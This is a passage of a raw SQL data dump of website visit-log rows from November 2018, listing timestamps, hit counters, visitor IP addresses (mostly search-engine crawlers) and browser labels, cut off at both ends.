304,1,1,0,0,'141.8.142.38','other'),(326830,1541530308,1,1,0,0,'178.154.244.29','other'),(326831,1541530512,1,1,0,0,'31.40.110.142','other'),(326832,1541530591,1,1,0,0,'8.29.198.25','other'),(326833,1541530652,2,2,0,0,'54.36.149.45','other'),(326834,1541530657,1,1,0,0,'54.36.148.251','other'),(326835,1541530700,1,1,0,0,'54.36.148.103','other'),(326836,1541530805,1,1,0,0,'54.36.149.38','other'),(326837,1541530934,1,1,0,0,'8.29.198.27','other'),(326838,1541531075,1,1,0,0,'176.36.35.35','chrome'),(326839,1541531115,1,1,0,0,'5.9.98.178','other'),(326840,1541531349,1,1,0,0,'54.36.148.220','other'),(326841,1541531409,1,1,0,0,'54.36.149.69','other'),(326842,1541531555,1,1,0,0,'95.132.13.163','chrome'),(326843,1541531842,4,4,0,0,'216.244.66.241','other'),(326845,1541531952,1,1,0,0,'54.36.148.69','other'),(326846,1541532021,1,1,0,0,'5.9.98.178','other'),(326847,1541532089,1,1,0,0,'91.196.178.34','chrome'),(326848,1541532143,2,2,0,0,'5.58.108.128','msie'),(326849,1541532314,1,1,0,0,'54.36.149.96','other'),(326850,1541532323,1,1,0,0,'46.211.10.56','chrome'),(326851,1541532524,1,1,0,0,'78.111.190.211','chrome'),(326852,1541532638,1,1,0,0,'54.36.148.141','other'),(326853,1541532674,1,1,0,0,'157.55.39.243','other'),(326854,1541532684,1,1,0,0,'54.36.149.100','other'),(326855,1541532837,1,1,0,0,'5.188.210.51','chrome'),(326856,1541532878,1,1,0,0,'37.55.225.224','chrome'),(326857,1541532924,1,1,0,0,'5.9.98.178','other'),(326858,1541532950,1,1,0,0,'37.190.161.80','chrome'),(326859,1541533077,1,1,0,0,'54.36.148.12','other'),(326860,1541533089,1,1,0,0,'207.46.13.242','other'),(326861,1541533147,1,1,0,0,'54.36.149.4','other'),(326862,1541533218,1,1,0,0,'66.249.66.155','chrome'),(326863,1541533221,2,2,0,0,'66.249.66.152','chrome'),(326864,1541533411,1,1,0,0,'82.145.209.37','other'),(326865,1541533441,1,1,0,0,'95.132.60.143','chrome'),(326866,1541533499,1,1,0,0,'66.249.66.156','chrome'),(326867,1541533501,1,1,0,0,'54.36.148.234','other'),(326868,1541533523,1,1,0,0,'46.211.43.131','other'),(326869,1541533709,1,1,0,0,'207.46.13.232','other'),(326870,1541533895,1,1,0,0,'5.9.98.178','other'),(326871,1541533987,1,1,0,0,'54.36.148.109','other'),(326872,1541534025,2,2,0,0,'46.211.117.80','chrome'),(326873,1541534324,4,4,0,0,'216.244.66.241','other'),(326874,1541534613,1,1,0,0,'54.165.59.7','other'),(326875,1541534654,1,1,0,0,'173.252.87.2','other'),(326876,1541534797,1,1,0,0,'5.9.98.178','other'),(326877,1541535029,1,1,0,0,'54.36.148.165','other'),(326878,1541535127,1,1,0,0,'54.36.149.60','other'),(326879,1541535182,1,1,0,0,'54.36.149.28','other'),(326880,1541535190,2,2,0,0,'178.154.244.29','other'),(326881,1541535439,1,1,0,0,'54.36.149.46','other'),(326883,1541535591,1,1,0,0,'91.196.178.35','chrome'),(326884,1541535599,1,1,0,0,'87.250.224.65','other'),(326885,1541535670,1,1,0,0,'54.36.149.31','other'),(326886,1541535705,1,1,0,0,'91.196.178.164','chrome'),(326887,1541535706,1,1,0,0,'54.36.149.5','other'),(326888,1541535710,1,1,0,0,'5.9.98.178','other'),(326889,1541535853,1,1,0,0,'66.220.149.7','other'),(326890,1541536094,1,1,0,0,'213.179.252.210','chrome'),(326891,1541536370,1,1,0,0,'54.36.148.152','other'),(326892,1541536420,2,2,0,0,'91.242.162.23','other'),(326893,1541536426,1,1,0,0,'94.178.7.200','chrome'),(326894,1541536621,1,1,0,0,'5.9.98.178','other'),(326895,1541536701,1,1,0,0,'46.211.68.114','chrome'),(326896,1541536709,3,3,0,0,'216.244.66.241','other'),(326897,1541536711,1,1,0,0,'54.36.149.60','other'),(326898,1541536970,1,1,0,0,'54.36.149.64','other'),(326899,1541537116,1,1,0,0,'54.36.148.113','other'),(326900,1541537471,1,1,0,0,'54.36.148.80','other'),(326901,1541537537,1,1,0,0,'5.9.98.178','other'),(326902,1541537574,1,1,0,0,'157.55.39.197','other'),(326903,1541537739,1,1,0,0,'54.36.148.65','other'),(326904,1541538339,1,1,0,0,'46.229.168.132','other'),(326905,1541538375,1,1,0,0,'46.188.121.156','chrome'),(326906,1541538438,1,1,0,0,'5.9.98.178','other'),(326907,1541539167,1,1,0,0,'54.36.148.82','other'),(326908,1541539199,1,1,0,0,'54.36.148.60','other'),(326909,1541539270,1,1,0,0,'91.196.150.177','chrome'),(326910,1541539535,4,4,0,0,'216.244.66.241','other'),(326911,1541539761,1,1,0,0,'37.73.152.221','other'),(326912,1541539823,1,1,0,0,'8.29.198.26','other'),(326913,1541540138,2,2,0,0,'66.249.66.156','chrome'),(326914,1541540162,1,1,0,0,'54.36.148.15','other'),(326915,1541540358,1,1,0,0,'54.36.148.106','other'),(326916,1541540803,1,1,0,0,'66.249.66.152','chrome'),(326917,1541540806,2,2,0,0,'66.249.66.154','chrome'),(326918,1541540883,1,1,0,0,'54.36.148.117','other'),(326919,1541540956,1,1,0,0,'91.196.178.164','chrome'),(326920,1541541454,1,1,0,0,'8.29.198.26','other'),(326921,1541541548,3,3,0,0,'216.244.66.241','other'),(326922,1541541638,1,1,0,0,'54.36.149.46','other'),(326923,1541541781,1,1,0,0,'54.36.148.202','other'),(326924,1541541808,1,1,0,0,'8.29.198.25','other'),(326925,1541541817,1,1,0,0,'54.36.148.243','other'),(326926,1541541914,1,1,0,0,'54.36.148.48','other'),(326927,1541541988,1,1,0,0,'54.36.149.28','other'),(326928,1541541994,1,1,0,0,'54.36.149.94','other'),(326929,1541542347,3,3,0,0,'66.249.66.156','chrome'),(326930,1541542355,7,7,0,0,'66.249.66.154','chrome'),(326931,1541542362,31,31,0,0,'66.249.66.152','chrome'),(326932,1541542585,1,1,0,0,'54.36.149.102','other'),(326933,1541542795,1,1,0,0,'54.36.148.25','other'),(326934,1541542916,1,1,0,0,'5.255.253.38','other'),(326935,1541542932,1,1,0,0,'87.250.224.65','other'),(326936,1541542953,3,3,0,0,'178.154.244.29','other'),(326937,1541543218,2,2,0,0,'91.242.162.23','other'),(326938,1541543263,49,49,0,0,'66.249.66.152','chrome'),(326939,1541543385,1,1,0,0,'178.154.244.11','other'),(326940,1541543388,1,1,0,0,'141.8.142.103','other'),(326941,1541543409,9,9,0,0,'66.249.66.154','chrome'),(326942,1541543725,1,1,0,0,'54.36.148.74','other'),(326943,1541543909,1,1,0,0,'54.36.148.131','other'),(326944,1541544265,1,1,0,0,'157.55.39.152','other'),(326945,1541544277,1,1,0,0,'95.163.255.96','other'),(326946,1541544280,1,1,0,0,'95.163.255.98','other'),(326947,1541544346,1,1,0,0,'54.36.149.40','other'),(326948,1541544424,15,15,0,0,'66.249.66.154','chrome'),(326949,1541544437,88,88,0,0,'66.249.66.152','chrome'),(326950,1541544493,1,1,0,0,'91.196.178.164','chrome'),(326951,1541544602,1,1,0,0,'54.36.148.227','other'),(326952,1541544633,1,1,0,0,'54.36.148.89','other'),(326953,1541544768,6,6,0,0,'66.249.66.156','chrome'),(326954,1541544791,4,4,0,0,'216.244.66.241','other'),(326955,1541544850,1,1,0,0,'54.36.148.148','other'),(326956,1541545030,1,1,0,0,'54.36.148.117','other'),(326957,1541545378,47,47,0,0,'66.249.66.152','chrome'),(326958,1541545444,10,10,0,0,'66.249.66.154','chrome'),(326959,1541545884,1,1,0,0,'54.36.148.237','other'),(326960,1541545931,2,2,0,0,'66.249.66.156','chrome'),(326961,1541546361,12,12,0,0,'66.249.66.152','chrome'),(326962,1541546382,1,1,0,0,'54.36.148.126','other'),(326963,1541546486,5,5,0,0,'66.249.66.154','chrome'),(326964,1541546503,1,1,0,0,'54.36.149.29','other'),(326965,1541546604,3,3,0,0,'216.244.66.241','other'),(326966,1541546652,1,1,0,0,'66.249.66.57','chrome'),(326967,1541546714,1,1,0,0,'207.46.13.190','other'),(326968,1541546722,1,1,0,0,'54.36.149.75','other'),(326969,1541546828,1,1,0,0,'54.36.148.48','other'),(326970,1541546841,1,1,0,0,'66.249.66.40','chrome'),(326971,1541546946,3,3,0,0,'66.249.66.156','chrome'),(326972,1541546995,1,1,0,0,'54.36.149.80','other'),(326973,1541547476,1,1,0,0,'54.36.148.65','other'),(326974,1541547539,11,11,0,0,'66.249.66.154','chrome'),(326975,1541547549,21,21,0,0,'66.249.66.152','chrome'),(326976,1541547573,1,1,0,0,'66.249.66.155','chrome'),(326977,1541547597,1,1,0,0,'54.36.148.144','other'),(326978,1541547741,1,1,0,0,'54.36.148.42','other'),(326979,1541547753,1,1,0,0,'54.36.148.211','other'),(326980,1541547862,1,1,0,0,'216.244.66.241','other'),(326981,1541547866,1,1,0,0,'157.55.39.243','other'),(326982,1541547920,1,1,0,0,'54.36.148.34','other'),(326983,1541547922,6,6,0,0,'66.249.66.156','chrome'),(326984,1541548228,1,1,0,0,'66.249.66.61','chrome'),(326985,1541548229,1,1,0,0,'66.249.66.44','chrome'),(326986,1541548455,11,11,0,0,'66.249.66.152','chrome'),(326987,1541548514,1,1,0,0,'62.205.134.182','other'),(326988,1541548524,2,2,0,0,'66.249.66.154','chrome'),(326989,1541548642,3,3,0,0,'66.249.66.155','chrome'),(326990,1541548713,1,1,0,0,'54.36.149.75','other'),(326991,1541548794,1,1,0,0,'54.36.149.39','other'),(326992,1541548944,11,11,0,0,'66.249.66.156','chrome'),(326993,1541549223,1,1,0,0,'69.171.251.3','other'),(326994,1541549225,1,1,0,0,'54.36.148.220','other'),(326995,1541549387,6,6,0,0,'216.244.66.241','other'),(326996,1541549476,11,11,0,0,'66.249.66.152','chrome'),(326997,1541549478,4,4,0,0,'66.249.66.154','chrome'),(326998,1541549579,1,1,0,0,'54.36.148.101','other'),(326999,1541549628,1,1,0,0,'54.36.148.48','other'),(327000,1541549708,1,1,0,0,'54.36.148.19','other'),(327001,1541549996,1,1,0,0,'54.36.148.76','other'),(327002,1541550056,6,6,0,0,'66.249.66.155','chrome'),(327003,1541550080,1,1,0,0,'66.249.66.57','chrome'),(327004,1541550087,1,1,0,0,'66.249.66.42','chrome'),(327005,1541550145,5,5,0,0,'66.249.66.156','chrome'),(327006,1541550250,1,1,0,0,'54.36.148.163','other'),(327007,1541550304,1,1,0,0,'66.249.66.157','chrome'),(327008,1541550381,1,1,0,0,'54.36.149.29','other'),(327009,1541550400,7,7,0,0,'66.249.66.154','chrome'),(327010,1541550454,33,33,0,0,'66.249.66.152','chrome'),(327011,1541550464,1,1,0,0,'216.244.66.241','other'),(327012,1541550509,1,1,0,0,'54.36.149.26','other'),(327013,1541550680,1,1,0,0,'8.29.198.26','other'),(327014,1541550751,1,1,0,0,'54.36.148.68','other'),(327015,1541550841,1,1,0,0,'54.36.149.19','other'),(327016,1541550901,1,1,0,0,'54.36.148.21','other'),(327017,1541550931,1,1,0,0,'54.36.149.98','other'),(327018,1541551074,1,1,0,0,'46.229.168.133','other'),(327019,1541551161,2,2,0,0,'66.249.66.156','chrome'),(327020,1541551366,2,2,0,0,'66.249.66.152','chrome'),(327021,1541551369,1,1,0,0,'66.249.66.157','chrome'),(327022,1541551370,4,4,0,0,'66.249.66.154','chrome'),(327023,1541551441,1,1,0,0,'87.250.224.65','other'),(327024,1541551453,1,1,0,0,'66.249.66.59','chrome'),(327025,1541551463,1,1,0,0,'66.249.66.40','chrome'),(327026,1541551475,1,1,0,0,'66.249.66.155','chrome'),(327027,1541551487,1,1,0,0,'178.154.244.11','other'),(327028,1541551489,1,1,0,0,'54.36.148.173','other'),(327029,1541551510,1,1,0,0,'178.154.244.29','other'),(327030,1541552312,1,1,0,0,'8.29.198.26','other'),(327031,1541552325,1,1,0,0,'66.249.66.154','other'),(327032,1541552387,1,1,0,0,'54.36.148.36','other'),(327033,1541552424,1,1,0,0,'66.249.66.154','chrome'),(327034,1541552499,1,1,0,0,'54.36.148.29','other'),(327035,1541552665,1,1,0,0,'8.29.198.25','other'),(327036,1541552680,1,1,0,0,'54.36.148.24','other'),(327037,1541552695,1,1,0,0,'54.36.148.237','other'),(327038,1541552712,2,2,0,0,'178.154.244.29','other'),(327039,1541552766,3,3,0,0,'216.244.66.241','other'),(327040,1541553036,4,4,0,0,'66.249.66.152','chrome'),(327041,1541553077,1,1,0,0,'66.249.66.157','chrome'),(327042,1541553273,1,1,0,0,'157.55.39.243','other'),(327043,1541553370,1,1,0,0,'54.36.149.51','other'),(327044,1541553492,1,1,0,0,'46.229.168.141','other'),(327045,1541553496,1,1,0,0,'46.229.168.145','other'),(327046,1541553541,3,3,0,0,'66.249.66.156','chrome'),(327047,1541553550,2,2,0,0,'66.249.66.155','chrome'),(327048,1541553671,1,1,0,0,'54.36.148.64','other'),(327049,1541553787,1,1,0,0,'54.36.148.95','other'),(327050,1541553837,3,3,0,0,'207.46.13.117','other'),(327051,1541553945,1,1,0,0,'95.163.255.99','other'),(327052,1541553947,1,1,0,0,'95.163.255.97','other'),(327053,1541554271,1,1,0,0,'54.36.148.84','other'),(327054,1541554370,1,1,0,0,'54.36.149.87','other'),(327055,1541554568,1,1,0,0,'54.36.148.200','other'),(327056,1541554820,1,1,0,0,'54.36.148.73','other'),(327057,1541554831,1,1,0,0,'46.229.168.134','other'),(327058,1541554832,1,1,0,0,'46.229.168.151','other'),(327059,1541554966,1,1,0,0,'66.249.66.155','chrome'),(327060,1541554967,1,1,0,0,'66.249.66.154','chrome'),(327061,1541555142,1,1,0,0,'54.36.148.55','other'),(327062,1541555150,1,1,0,0,'66.249.66.156','chrome'),(327063,1541555204,1,1,0,0,'54.36.148.202','other'),(327064,1541555472,1,1,0,0,'216.244.66.241','other'),(327065,1541555546,1,1,0,0,'54.36.149.16','other'),(327066,1541556427,2,2,0,0,'66.249.66.156','chrome'),(327067,1541556447,1,1,0,0,'66.249.66.155','chrome'),(327068,1541556496,1,1,0,0,'66.249.66.152','chrome'),(327069,1541556570,1,1,0,0,'54.36.149.85','other'),(327070,1541556611,1,1,0,0,'54.36.149.63','other'),(327071,1541556969,1,1,0,0,'66.249.66.154','chrome'),(327072,1541557052,1,1,0,0,'54.36.148.255','other'),(327073,1541557087,1,1,0,0,'54.36.148.209','other'),(327074,1541557296,1,1,0,0,'54.36.148.81','other'),(327075,1541557577,2,2,0,0,'54.186.192.12','chrome'),(327076,1541557585,3,3,0,0,'66.249.66.156','chrome'),(327077,1541557940,2,2,0,0,'216.244.66.241','other'),(327078,1541558107,5,5,0,0,'66.249.66.155','chrome'),(327079,1541558228,1,1,0,0,'54.36.149.91','other'),(327080,1541558274,1,1,0,0,'54.36.149.44','other'),(327081,1541558585,1,1,0,0,'54.36.148.45','other'),(327082,1541558606,12,12,0,0,'66.249.66.152','chrome'),(327083,1541558616,3,3,0,0,'66.249.66.154','chrome'),(327084,1541558648,2,2,0,0,'66.249.66.156','chrome'),(327085,1541559015,1,1,0,0,'66.249.66.42','chrome'),(327086,1541559024,1,1,0,0,'157.55.13.64','other'),(327087,1541559045,2,2,0,0,'66.249.66.157','chrome'),(327088,1541559084,7,7,0,0,'66.249.66.155','chrome'),(327089,1541559130,1,1,0,0,'54.36.148.233','other'),(327090,1541559142,1,1,0,0,'31.43.152.241','chrome'),(327091,1541559721,1,1,0,0,'66.249.66.152','chrome'),(327092,1541559726,1,1,0,0,'66.249.66.154','chrome'),(327093,1541560035,1,1,0,0,'46.229.168.133','other'),(327094,1541560221,4,4,0,0,'216.244.66.241','other'),(327095,1541560325,1,1,0,0,'54.36.148.186','other'),(327096,1541560619,1,1,0,0,'54.36.148.169','other'),(327097,1541560687,1,1,0,0,'54.36.149.104','other'),(327098,1541561219,2,2,0,0,'157.55.39.243','other'),(327099,1541561250,1,1,0,0,'66.249.66.156','chrome'),(327100,1541561253,1,1,0,0,'54.36.148.191','other'),(327101,1541561543,1,1,0,0,'8.29.198.26','other'),(327102,1541562083,1,1,0,0,'46.229.168.136','other'),(327103,1541562085,1,1,0,0,'46.229.168.153','other'),(327104,1541562171,1,1,0,0,'54.36.149.57','other'),(327105,1541562293,2,2,0,0,'66.249.66.152','chrome'),(327106,1541562317,1,1,0,0,'5.39.34.40','firefox'),(327107,1541562530,1,1,0,0,'51.255.65.46','other'),(327108,1541562890,5,5,0,0,'216.244.66.241','other'),(327109,1541562905,1,1,0,0,'46.229.168.146','other'),(327110,1541562906,1,1,0,0,'66.249.66.155','chrome'),(327111,1541563020,1,1,0,0,'54.36.148.11','other'),(327112,1541563029,1,1,0,0,'54.36.148.216','other'),(327113,1541563101,2,2,0,0,'54.36.148.223','other'),(327114,1541563145,1,1,0,0,'66.249.66.154','chrome'),(327115,1541563167,1,1,0,0,'8.29.198.27','other'),(327116,1541563514,1,1,0,0,'8.29.198.26','other'),(327117,1541563953,4,4,0,0,'178.154.244.29','other'),(327118,1541564044,6,6,0,0,'178.154.244.11','other'),(327119,1541564247,1,1,0,0,'54.36.148.108','other'),(327120,1541564293,2,2,0,0,'216.244.66.241','other'),(327121,1541564316,1,1,0,0,'54.36.148.223','other'),(327122,1541564725,1,1,0,0,'54.36.148.128','other'),(327123,1541564784,3,3,0,0,'95.163.255.113','other'),(327124,1541564797,1,1,0,0,'95.163.255.114','other'),(327125,1541564814,1,1,0,0,'95.163.255.102','other'),(327126,1541564819,1,1,0,0,'95.163.255.108','other'),(327127,1541564969,1,1,0,0,'66.249.66.157','chrome'),(327128,1541565054,1,1,0,0,'66.249.66.57','chrome'),(327129,1541565087,1,1,0,0,'66.249.66.152','chrome'),(327130,1541565088,1,1,0,0,'66.102.9.131','chrome'),(327131,1541565090,1,1,0,0,'46.211.72.201','chrome'),(327132,1541565127,1,1,0,0,'66.249.66.44','chrome'),(327133,1541565130,1,1,0,0,'66.249.66.155','chrome'),(327134,1541565387,2,2,0,0,'66.249.66.154','chrome'),(327135,1541566153,1,1,0,0,'66.249.66.42','chrome'),(327136,1541566244,1,1,0,0,'54.36.149.68','other'),(327137,1541566638,2,2,0,0,'66.249.66.152','chrome'),(327138,1541566893,1,1,0,0,'54.36.148.99','other'),(327139,1541567101,1,1,0,0,'54.36.148.72','other'),(327140,1541567109,1,1,0,0,'54.36.148.64','other'),(327141,1541567406,1,1,0,0,'66.249.66.156','chrome'),(327142,1541567462,1,1,0,0,'178.154.244.29','other'),(327143,1541567488,1,1,0,0,'54.36.148.13','other'),(327144,1541567640,1,1,0,0,'66.249.66.40','chrome'),(327145,1541567674,1,1,0,0,'54.36.148.248','other'),(327146,1541567871,1,1,0,0,'46.229.168.147','other'),(327147,1541567872,1,1,0,0,'46.229.168.132','other'),(327148,1541567965,1,1,0,0,'54.36.148.85','other'),(327149,1541568156,6,6,0,0,'216.244.66.241','other'),(327150,1541569047,1,1,0,0,'54.36.148.140','other'),(327151,1541569332,1,1,0,0,'66.249.66.155','chrome'),(327152,1541569463,1,1,0,0,'66.249.66.152','chrome'),(327153,1541569662,1,1,0,0,'46.229.168.149','other'),(327154,1541569841,1,1,0,0,'54.36.149.56','other'),(327155,1541569901,1,1,0,0,'54.36.148.30','other'),(327156,1541570397,1,1,0,0,'207.46.13.190','other'),(327157,1541570539,1,1,0,0,'54.36.148.74','other'),(327158,1541571099,1,1,0,0,'216.244.66.241','other'),(327159,1541571161,1,1,0,0,'54.36.149.79','other'),(327160,1541571224,1,1,0,0,'54.36.148.166','other'),(327161,1541571490,1,1,0,0,'91.196.178.135','chrome'),(327162,1541571670,1,1,0,0,'193.106.30.98','firefox'),(327163,1541572404,1,1,0,0,'8.29.198.27','other'),(327164,1541572439,1,1,0,0,'54.36.149.84','other'),(327165,1541572459,1,1,0,0,'54.36.149.44','other'),(327166,1541572464,1,1,0,0,'54.36.148.166','other'),(327167,1541572472,5,5,0,0,'66.249.66.155','chrome'),(327168,1541572474,1,1,0,0,'66.249.66.61','chrome'),(327169,1541572493,3,3,0,0,'66.249.66.152','chrome'),(327170,1541572495,1,1,0,0,'66.249.66.40','chrome'),(327171,1541572565,1,1,0,0,'54.36.149.46','other'),(327172,1541572726,1,1,0,0,'207.46.13.117','other'),(327173,1541572775,1,1,0,0,'54.36.149.86','other'),(327174,1541572810,1,1,0,0,'66.249.66.154','chrome'),(327175,1541572853,1,1,0,0,'54.36.148.215','other'),(327176,1541572869,3,3,0,0,'216.244.66.241','other'),(327177,1541573180,1,1,0,0,'54.36.149.11','other'),(327178,1541573235,1,1,0,0,'54.36.148.98','other'),(327179,1541573898,1,1,0,0,'46.211.71.236','chrome'),(327180,1541574033,2,2,0,0,'8.29.198.25','other'),(327181,1541574080,1,1,0,0,'54.36.148.19','other'),(327182,1541574293,1,1,0,0,'54.36.148.238','other'),(327183,1541574607,1,1,0,0,'54.36.149.57','other'),(327184,1541574677,1,1,0,0,'216.244.66.241','other'),(327185,1541574872,1,1,0,0,'54.36.148.128','other'),(327186,1541574875,2,2,0,0,'91.209.11.236','other'),(327187,1541575011,1,1,0,0,'54.36.148.94','other'),(327188,1541575064,1,1,0,0,'54.36.149.100','other'),(327189,1541575296,1,1,0,0,'54.36.178.138','other'),(327190,1541575346,5,5,0,0,'178.154.244.29','other'),(327191,1541575354,3,3,0,0,'178.154.244.11','other'),(327192,1541575433,2,2,0,0,'95.135.45.43','firefox'),(327193,1541575635,3,3,0,0,'5.45.207.79','other'),(327194,1541575907,1,1,0,0,'54.36.148.68','other'),(327195,1541575946,1,1,0,0,'141.8.142.103','other'),(327196,1541575948,1,1,0,0,'54.36.148.87','other'),(327197,1541575986,1,1,0,0,'54.36.149.83','other'),(327198,1541576175,1,1,0,0,'54.36.148.187','other'),(327199,1541576249,2,2,0,0,'216.244.66.241','other'),(327200,1541576286,1,1,0,0,'178.154.244.29','other'),(327201,1541576327,1,1,0,0,'54.36.148.196','other'),(327202,1541576363,1,1,0,0,'54.36.149.39','other'),(327203,1541576460,1,1,0,0,'95.163.255.94','other'),(327204,1541576464,1,1,0,0,'95.163.255.96','other'),(327205,1541576528,1,1,0,0,'66.249.66.156','chrome'),(327206,1541576530,2,2,0,0,'37.53.80.217','chrome'),(327207,1541576539,1,1,0,0,'54.36.148.129','other'),(327208,1541576597,1,1,0,0,'54.36.148.166','other'),(327209,1541576609,2,2,0,0,'66.249.66.154','chrome'),(327210,1541576633,2,2,0,0,'95.132.36.252','firefox'),(327211,1541576833,2,2,0,0,'95.133.29.83','chrome'),(327212,1541576863,1,1,0,0,'178.154.244.11','other'),(327213,1541576991,1,1,0,0,'46.229.168.144','other'),(327214,1541577374,2,2,0,0,'91.196.178.76','firefox'),(327215,1541577393,3,3,0,0,'157.55.39.152','other'),(327216,1541577399,5,5,0,0,'207.46.13.117','other'),(327217,1541577406,5,5,0,0,'207.46.13.190','other'),(327218,1541577429,1,1,0,0,'66.249.66.157','chrome'),(327219,1541577436,5,5,0,0,'157.55.39.243','other'),(327220,1541577674,1,1,0,0,'54.36.148.88','other'),(327221,1541577698,1,1,0,0,'54.36.148.229','other'),(327222,1541577888,1,1,0,0,'54.36.148.72','other'),(327223,1541578056,1,1,0,0,'178.154.244.29','other'),(327224,1541578108,1,0,1,0,'66.249.66.154',''),(327225,1541578393,1,1,0,0,'216.244.66.241','other'),(327226,1541578428,1,1,0,0,'54.36.149.69','other'),(327227,1541578551,1,1,0,0,'54.36.149.21','other'),(327228,1541579071,1,1,0,0,'54.36.148.204','other'),(327229,1541579243,1,1,0,0,'54.36.148.120','other'),(327230,1541579651,1,1,0,0,'54.36.148.194','other'),(327231,1541580027,1,1,0,0,'54.36.148.224','other'),(327232,1541580137,2,2,0,0,'91.196.177.46','firefox'),(327233,1541580280,1,1,0,0,'54.36.148.162','other'),(327234,1541580325,1,1,0,0,'37.55.224.205','chrome'),(327235,1541580552,1,1,0,0,'54.36.148.144','other'),(327236,1541580648,1,1,0,0,'54.36.148.211','other'),(327237,1541581016,1,1,0,0,'54.36.148.240','other'),(327238,1541581061,1,1,0,0,'54.36.149.16','other'),(327239,1541581123,2,2,0,0,'91.196.178.93','chrome'),(327240,1541581413,1,1,0,0,'66.249.66.157','chrome'),(327241,1541581414,1,1,0,0,'66.249.66.154','chrome'),(327242,1541581610,1,1,0,0,'46.229.168.152','other'),(327243,1541581614,1,1,0,0,'46.229.168.146','other'),(327244,1541581866,3,3,0,0,'66.249.66.156','chrome'),(327245,1541581893,3,3,0,0,'66.249.66.152','chrome'),(327246,1541582098,1,1,0,0,'95.163.255.99','other'),(327247,1541582101,1,1,0,0,'95.163.255.96','other'),(327248,1541582474,2,2,0,0,'91.196.178.135','firefox'),(327249,1541582520,1,1,0,0,'54.36.148.148','other'),(327250,1541582976,1,1,0,0,'54.36.148.47','other'),(327251,1541583089,1,1,0,0,'54.36.148.169','other'),(327252,1541583235,1,1,0,0,'54.36.148.85','other'),(327253,1541583239,2,2,0,0,'130.180.220.117','chrome'),(327254,1541583280,1,1,0,0,'8.29.198.26','other'),(327255,1541583479,1,1,0,0,'188.163.5.102','firefox'),(327256,1541583808,1,1,0,0,'54.36.149.16','other'),(327257,1541583893,2,2,0,0,'66.249.66.154','chrome'),(327258,1541583903,1,1,0,0,'66.249.66.157','chrome'),(327259,1541583910,4,4,0,0,'66.249.66.152','chrome'),(327260,1541583975,2,2,0,0,'216.244.66.241','other'),(327261,1541584365,1,1,0,0,'54.36.148.78','other'),(327262,1541584509,1,1,0,0,'54.36.149.91','other'),(327263,1541584568,1,1,0,0,'157.55.39.152','other'),(327264,1541584727,1,1,0,0,'66.249.66.155','chrome'),(327265,1541584748,1,1,0,0,'66.249.66.44','chrome'),(327266,1541584886,1,1,0,0,'8.29.198.27','other'),(327267,1541585219,1,1,0,0,'8.29.198.25','other'),(327269,1541585261,3,3,0,0,'66.249.66.156','chrome'),(327270,1541585333,1,1,0,0,'54.36.149.30','other'),(327271,1541585744,1,1,0,0,'54.36.148.205','other'),(327272,1541585802,1,1,0,0,'66.249.66.157','chrome'),(327274,1541586049,2,2,0,0,'54.36.148.255','other'),(327275,1541586562,2,2,0,0,'216.244.66.241','other'),(327276,1541586735,1,1,0,0,'91.196.178.77','chrome'),(327277,1541586809,1,1,0,0,'54.36.148.68','other'),(327278,1541586982,1,1,0,0,'54.36.148.73','other'),(327279,1541587009,1,1,0,0,'54.36.149.63','other'),(327280,1541587178,1,1,0,0,'54.36.148.176','other'),(327281,1541587253,1,1,0,0,'54.36.148.20','other'),(327282,1541587364,1,1,0,0,'54.36.148.19','other'),(327283,1541587464,2,2,0,0,'66.249.66.152','chrome'),(327284,1541587641,1,1,0,0,'54.36.148.104','other'),(327285,1541587682,1,1,0,0,'66.249.66.156','chrome'),(327286,1541587712,2,2,0,0,'95.163.255.93','other'),(327287,1541587804,1,1,0,0,'46.229.168.130','other'),(327288,1541588001,1,1,0,0,'54.36.148.217','other'),(327289,1541588213,6,6,0,0,'216.244.66.241','other'),(327290,1541588220,1,1,0,0,'54.36.148.118','other'),(327291,1541588940,1,1,0,0,'66.249.66.154','chrome'),(327292,1541588957,1,1,0,0,'54.36.148.21','other'),(327293,1541589016,1,1,0,0,'54.36.148.197','other'),(327294,1541590013,1,1,0,0,'54.36.148.38','other'),(327295,1541590279,1,1,0,0,'54.36.148.47','other'),(327296,1541590622,1,1,0,0,'54.36.148.50','other'),(327297,1541590658,2,2,0,0,'54.36.148.39','other'),(327298,1541590787,1,1,0,0,'54.36.148.189','other'),(327299,1541591198,1,1,0,0,'216.244.66.241','other'),(327300,1541591812,1,1,0,0,'54.36.148.110','other'),(327301,1541592266,1,1,0,0,'66.249.66.57','chrome'),(327302,1541592267,1,1,0,0,'66.249.66.44','chrome'),(327303,1541592741,1,1,0,0,'193.106.30.98','firefox'),(327304,1541592801,1,1,0,0,'54.36.149.15','other'),(327305,1541592931,3,3,0,0,'216.244.66.241','other'),(327306,1541593098,1,1,0,0,'66.249.66.42','chrome'),(327307,1541593230,1,1,0,0,'54.36.148.241','other'),(327308,1541593333,1,1,0,0,'95.163.255.96','other'),(327309,1541593336,1,1,0,0,'95.163.255.93','other'),(327310,1541593642,1,1,0,0,'66.249.66.157','chrome'),(327311,1541593660,1,1,0,0,'66.249.66.154','chrome'),(327312,1541594041,1,1,0,0,'54.36.148.120','other'),(327313,1541594153,1,1,0,0,'8.29.198.26','other'),(327314,1541594627,2,2,0,0,'91.196.177.46','firefox'),(327315,1541594939,2,2,0,0,'46.174.125.28','chrome'),(327316,1541595203,1,1,0,0,'54.36.148.124','other'),(327317,1541595459,2,2,0,0,'66.249.66.157','chrome'),(327318,1541595616,1,1,0,0,'163.172.132.199','chrome'),(327319,1541595733,2,2,0,0,'8.29.198.25','other'),(327320,1541595959,1,1,0,0,'54.36.148.165','other'),(327321,1541596016,1,1,0,0,'54.36.149.55','other'),(327322,1541596795,3,3,0,0,'91.196.177.46','firefox'),(327323,1541596875,1,1,0,0,'54.36.148.82','other'),(327324,1541596988,3,3,0,0,'157.55.39.243','other'),(327325,1541597306,2,2,0,0,'54.165.59.7','other'),(327326,1541597681,1,1,0,0,'54.36.148.21','other'),(327327,1541597875,2,2,0,0,'91.196.178.92','firefox'),(327328,1541597913,1,1,0,0,'54.36.148.111','other'),(327329,1541597974,1,1,0,0,'54.36.148.215','other'),(327330,1541598016,1,1,0,0,'54.36.148.208','other'),(327331,1541598059,1,1,0,0,'54.36.148.103','other'),(327332,1541598632,1,1,0,0,'91.196.177.46','firefox'),(327333,1541598804,1,1,0,0,'95.163.255.118','other'),(327334,1541598809,1,1,0,0,'95.163.255.104','other'),(327335,1541598813,1,1,0,0,'95.163.255.95','other'),(327336,1541598819,2,2,0,0,'95.163.255.93','other'),(327337,1541598835,1,1,0,0,'77.222.134.101','other'),(327338,1541598942,1,1,0,0,'95.163.255.96','other'),(327339,1541599165,1,1,